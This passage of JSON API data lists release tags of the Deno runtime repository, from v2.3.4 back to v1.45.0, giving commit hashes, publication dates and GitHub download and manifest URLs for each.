tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","p